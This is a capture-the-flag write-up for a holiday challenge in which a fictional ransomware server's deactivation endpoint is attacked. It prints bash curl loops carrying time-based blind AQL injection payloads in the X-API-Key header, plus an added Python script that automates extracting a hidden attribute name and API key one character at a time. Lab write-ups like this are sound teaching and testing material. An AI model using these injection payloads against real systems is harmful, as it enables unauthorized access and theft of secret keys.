
Deactivate Frostbit Naughty-Nice List Publication⚓︎

Difficulty:

This challenge was not completed as part of the contest since someone else's walkthrough was used to help me learn and I completed the challenge after the deadline.

Objective⚓︎

Wombley's ransomware server is threatening to publish the Naughty-Nice list. Find a way to deactivate the publication of the Naughty-Nice list by the ransomware server.

Hints⚓︎

Frostbit Publication

There must be a way to deactivate the ransomware server's data publication. Perhaps one of the other North Pole assets revealed something that could help us find the deactivation path. If so, we might be able to trick the Frostbit infrastructure into revealing more details.

Frostbit Slumber

The Frostbit author may have mitigated the use of certain characters, verbs, and simple authentication bypasses, leaving us blind in this case. Therefore, we might need to trick the application into responding differently based on our input and measure its response. If we know the underlying technology used for data storage, we can replicate it locally using Docker containers, allowing us to develop and test techniques and payloads with greater insight into how the application functions.

Gold Solution⚓︎

Knowns⚓︎

We know from our strings queries during the Decrypt challenge that the bot UUID is used for interactions with the API, and we know from the SantaVision challenge that there is a path for deactivating a bot: /api/v1/frostbitadmin/bot/<botuuid>/deactivate.

Hint from SantaVision Feed

Error msg: Unauthorized access attempt. /api/v1/frostbitadmin/bot/<botuuid>/deactivate, authHeader: X-API-Key, status: Invalid Key, alert: Warning, recipient: Wombley

UUID: 9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d

Test endpoint⚓︎


After these basic tests, we have established that our UUID is accepted by the API and that the value of the X-API-Key header is placed into a server-side query without sanitization, so it is vulnerable to query injection (the payloads below use ArangoDB AQL syntax: ATTRIBUTES(), SUBSTRING(), sleep() and the ?: ternary operator).

Further testing indicates that the usual ways of retrieving output from the injection (error messages, reflected data, unions) are blocked, so the injection is blind. We need a way to find the omitted attribute name that the query compares against {user_supplied_x_api_key}.

Create a Bash Command to Blindly Test Each Character for the Omitted API Key's Attribute Name⚓︎

for i in {a..z} {0..9} '_' '-' '#'; do
  echo "Testing $i"
  # A true comparison makes the server sleep 30s, so curl's 1-second timeout is the "match" signal
  curl --max-time 1 "https://api.frostbit.app/api/v1/frostbitadmin/bot/9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d/deactivate?debug=true" \
    -H "X-API-Key: Test' || (SUBSTRING(ATTRIBUTES(doc)[0],0,1) == \"$i\" ? sleep(30) : 2) || '"
  echo ""
  sleep 1
done
Explanation of Command

Character Set⚓︎

{a..z} {0..9} '_' '-' '#'
The set of characters to test includes all lowercase letters (a-z), digits (0-9), and specific special characters (_, -, #).

Conditional Logic Injection⚓︎

Test' || (SUBSTRING(ATTRIBUTES(doc)[0],0,1) == "$i" ? sleep(30) : 2) || '
SUBSTRING(ATTRIBUTES(doc)[0], 0, 1): ATTRIBUTES(doc)[0] is the name of the document's first attribute; SUBSTRING takes one character from it, starting at index 0 (the second argument) and of length 1 (the third argument). Incrementing the start index on each run walks through the name one character at a time.
== "$i": Compares the extracted character to the current candidate character ($i).
? sleep(30) : 2: If the comparison is true, the server sleeps for 30 seconds before responding; otherwise it evaluates to 2 and responds immediately. The leading Test' || ( closes the original string literal and ORs in our expression, and the trailing || ' reopens the string so the rest of the query stays syntactically valid.

Output and Rate Limiting⚓︎

echo "Testing $i"
curl --max-time 1 ...
sleep 1
Prints the current character being tested for logging.
--max-time 1: Makes curl give up after 1 second. Non-matching characters return immediately, while the matching character triggers the 30-second server sleep and therefore a curl timeout; the timeout is the signal that the guess was correct, and it also stops us from waiting the full 30 seconds.
sleep 1: Adds a delay between requests to avoid overwhelming the server or triggering rate limits.


This blind process is repeated, advancing the SUBSTRING start index by one on each run, until the entire attribute name is revealed: deactivate_api_key

Now that we have the attribute name, we can modify the bash command to pull out the value of deactivate_api_key by reading doc.deactivate_api_key directly. Since the value is likely a UUID, which is made up only of the characters a-f, 0-9 and -, the set of candidates we need to iterate through is much smaller.

for i in {a..f} {0..9} '_' '-' '#'; do
  echo "Testing $i"
  # Same time-based oracle, now reading the value of the recovered attribute
  curl --max-time 1 "https://api.frostbit.app/api/v1/frostbitadmin/bot/9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d/deactivate?debug=true" \
    -H "X-API-Key: Test' || (SUBSTRING(doc.deactivate_api_key,0,1) == \"$i\" ? sleep(30) : 2) || '"
  echo ""
  sleep 1
done
Once the command has been re-run for indices 0 through 35, we expect the run for index 36 to produce no timeout for any candidate, since a UUID is 36 characters long and SUBSTRING past the end of the value returns an empty string; running it anyway confirms that we have reached the end of the value.
for i in {a..f} {0..9} '-'; do
  echo "Testing $i"
  # Index 36 is one past the end of a UUID: no candidate should time out
  curl --max-time 1 "https://api.frostbit.app/api/v1/frostbitadmin/bot/9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d/deactivate?debug=true" \
    -H "X-API-Key: Test' || (SUBSTRING(doc.deactivate_api_key,36,1) == \"$i\" ? sleep(30) : 2) || '"
  echo ""
  sleep 1
done
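The bash loops above each hard-code one SUBSTRING index and are re-run by hand for every position. As an added example, not part of the original writeup, the Python script below generalises both the attribute-name and the key-value extraction into one routine that advances the index automatically and stops at the first position where no candidate matches. The HTTP oracle uses urllib and treats a 1-second timeout as "true"; fake_oracle_for is a constructed offline stand-in that evaluates the same two expression shapes against a sample document, so the extraction logic can be exercised without the target. The function names, the sample document and the urllib timeout handling are assumptions of this example, not something the page describes.

```python
import re
import socket
import string
import time
import urllib.error
import urllib.request

# Endpoint and bot UUID from the writeup; the header payload shape matches the bash loops above.
BASE_URL = "https://api.frostbit.app/api/v1/frostbitadmin/bot"
BOT_UUID = "9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d"
SERVER_SLEEP = 30   # seconds the server sleeps when the injected comparison is true
TIMEOUT = 1.0       # client timeout; a timed-out request is read as "true"

ATTR_CHARSET = list(string.ascii_lowercase + string.digits + "_-#")  # attribute names
UUID_CHARSET = list("abcdef0123456789-")                              # UUID values


def build_payload(expr, ch):
    """Build the X-API-Key value: close the string literal, OR in a ternary that
    sleeps only when the character expression `expr` equals `ch`, then reopen the string."""
    return f"Test' || ({expr} == \"{ch}\" ? sleep({SERVER_SLEEP}) : 2) || '"


def attr_name_expr(i):
    """AQL expression for character i of the document's first attribute name."""
    return f"SUBSTRING(ATTRIBUTES(doc)[0],{i},1)"


def key_value_expr(i):
    """AQL expression for character i of the deactivate_api_key attribute value."""
    return f"SUBSTRING(doc.deactivate_api_key,{i},1)"


def http_oracle(expr, ch):
    """Time-based oracle against the live endpoint (assumed urllib behaviour):
    True if the request times out, i.e. the server hit sleep(); otherwise False.
    A fast 4xx such as the usual 'Invalid Key' response counts as False."""
    req = urllib.request.Request(
        f"{BASE_URL}/{BOT_UUID}/deactivate?debug=true",
        headers={"X-API-Key": build_payload(expr, ch)},
    )
    try:
        urllib.request.urlopen(req, timeout=TIMEOUT).read()
        return False
    except urllib.error.HTTPError:
        return False
    except (socket.timeout, TimeoutError):
        return True
    except urllib.error.URLError as err:
        return isinstance(err.reason, (socket.timeout, TimeoutError))


def fake_oracle_for(doc):
    """Offline stand-in for the server (constructed for this example): evaluates only the
    two expression shapes this script emits against `doc`, whose first key plays the
    role of ATTRIBUTES(doc)[0]."""
    pattern = re.compile(r"SUBSTRING\((ATTRIBUTES\(doc\)\[0\]|doc\.(\w+)),(\d+),1\)")

    def oracle(expr, ch):
        m = pattern.fullmatch(expr)
        if m is None:
            raise ValueError(f"unsupported expression: {expr}")
        value = next(iter(doc)) if m.group(2) is None else doc[m.group(2)]
        i = int(m.group(3))
        return value[i:i + 1] == ch   # "" past the end never equals a candidate

    return oracle


def extract(oracle, expr_for_index, charset, max_len=64, delay=0.0):
    """Recover a string one character at a time. Stops at the first index where no
    candidate matches, which is how the loop detects the end of the value."""
    found = []
    for i in range(max_len):
        for ch in charset:
            if oracle(expr_for_index(i), ch):
                found.append(ch)
                break
            time.sleep(delay)   # pacing between requests, as the bash loops do
        else:
            break
    return "".join(found)


if __name__ == "__main__":
    # Live run (needs network): recover the attribute name, then its value, 1s between requests.
    name = extract(http_oracle, attr_name_expr, ATTR_CHARSET, delay=1.0)
    print("attribute name:", name)
    print("key value:", extract(http_oracle, key_value_expr, UUID_CHARSET, delay=1.0))
```

Against the fake oracle seeded with the values the writeup recovered, the same extract() call returns deactivate_api_key for the attribute name and the 36-character key for its value, stopping by itself at index 36 because no candidate matches there. The live path only differs in which oracle is passed in, which is the point of separating the oracle from the search loop.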

deactivate_api_key

abe7a6ad-715e-4e6a-901b-c9279a964f91

Having the correct API key means we can now craft our curl command:

curl "https://api.frostbit.app/api/v1/frostbitadmin/bot/9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d/deactivate?debug=true" \
-H "X-API-Key: <correct_api_key>"

Output

{"message":"Response status code: 200, Response body: {\"result\":\"success\",\"rid\":\"9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d\",\"hash\":\"21f4af748683f9b22a3e291b38ccf294f29a1d6867bcc85dac4b2683bc326f5b\",\"uid\":\"80065\"}\nPOSTED WIN RESULTS FOR RID 9c5e7d5a-0d19-4ed0-9f93-017cab14fd7d","status":"Deactivated"}